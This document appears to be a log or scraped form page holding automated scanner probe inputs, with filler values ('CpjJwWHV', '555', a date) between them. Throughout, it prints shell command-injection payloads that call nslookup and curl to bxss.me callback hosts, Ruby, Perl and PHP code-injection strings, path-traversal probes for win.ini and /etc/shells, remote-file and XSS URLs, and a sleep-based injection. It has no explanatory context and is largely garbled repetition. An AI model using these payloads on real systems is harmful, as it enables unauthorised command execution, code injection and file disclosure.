CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
c:/windows/win.ini
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
/etc/shells
7/19/2023
555
CpjJwWHV
7/19/2023
555
'+'A'.concat(70-3).concat(22*4).concat(113).concat(80).concat(118).concat(73)+(require'socket' Socket.gethostbyname('hitmn'+'jknpjinxdbcb9.bxss.me.')[3].to_s)+'
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
&(nslookup -q=cname hitmktsnqivkff9cae.bxss.me||curl hitmktsnqivkff9cae.bxss.me)&'\"`0&(nslookup -q=cname hitmktsnqivkff9cae.bxss.me||curl hitmktsnqivkff9cae.bxss.me)&`'
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
HttP://bxss.me/t/xss.html?%00
CpjJwWHV
7/19/2023
^(#$!@#$)(()))******
CpjJwWHV
7/19/2023
555
"+"A".concat(70-3).concat(22*4).concat(104).concat(72).concat(101).concat(68)+(require"socket" Socket.gethostbyname("hitbe"+"dvttopvd42425.bxss.me.")[3].to_s)+"
7/19/2023
".gethostbyname(lc("hitnt"."zybzdbht66be4.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(73).chr(97).chr(90)."
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
'.gethostbyname(lc('hitoz'.'vldlqzse6793f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(85).chr(108).chr(90).'
CpjJwWHV
7/19/2023
!(()&&!|*|*|
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
)
CpjJwWHV
7/19/2023
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
'.gethostbyname(lc('hitms'.'qjbqafvaa2b19.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(81).chr(120).chr(86).'
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
&nslookup -q=cname hitiasiphaggl8d337.bxss.me&'\"`0&nslookup -q=cname hitiasiphaggl8d337.bxss.me&`'
7/19/2023
555
|(nslookup -q=cname hitiuylcciqnv14dbe.bxss.me||curl hitiuylcciqnv14dbe.bxss.me)
7/19/2023
555
;(nslookup -q=cname hitlojdanxvsk012c7.bxss.me||curl hitlojdanxvsk012c7.bxss.me)|(nslookup -q=cname hitlojdanxvsk012c7.bxss.me||curl hitlojdanxvsk012c7.bxss.me)&(nslookup -q=cname hitlojdanxvsk012c7.bxss.me||curl hitlojdanxvsk012c7.bxss.me)
7/19/2023
555
CpjJwWHV
7/19/2023
555
bxss.me/t/xss.html?%00
7/19/2023
555
http://bxss.me/t/fit.txt?.jpg
7/19/2023
555
`(nslookup -q=cname hitobinddfknofa0d0.bxss.me||curl hitobinddfknofa0d0.bxss.me)`
7/19/2023
555
CpjJwWHV
7/19/2023
555
../CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
Http://bxss.me/t/fit.txt
7/19/2023
555
./CpjJwWHV
7/19/2023
555
".gethostbyname(lc("hitbm"."fcorghlz99e78.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(80).chr(101).chr(68)."
7/19/2023
555
';print(md5(31337));$a='
7/19/2023
555
CpjJwWHV
7/19/2023
555
${@print(md5(31337))}\
7/19/2023
555
CpjJwWHV
7/19/2023
555
HttP://bxss.me/t/xss.html?%00
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
xfs.bxss.me
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
'+'A'.concat(70-3).concat(22*4).concat(101).concat(66).concat(120).concat(85)+(require'socket' Socket.gethostbyname('hitco'+'qecmkdjp5c6ef.bxss.me.')[3].to_s)+'
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV"||sleep(27*1000)*moteut||"
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
xfs.bxss.me?ac.th
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV'"()&%
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023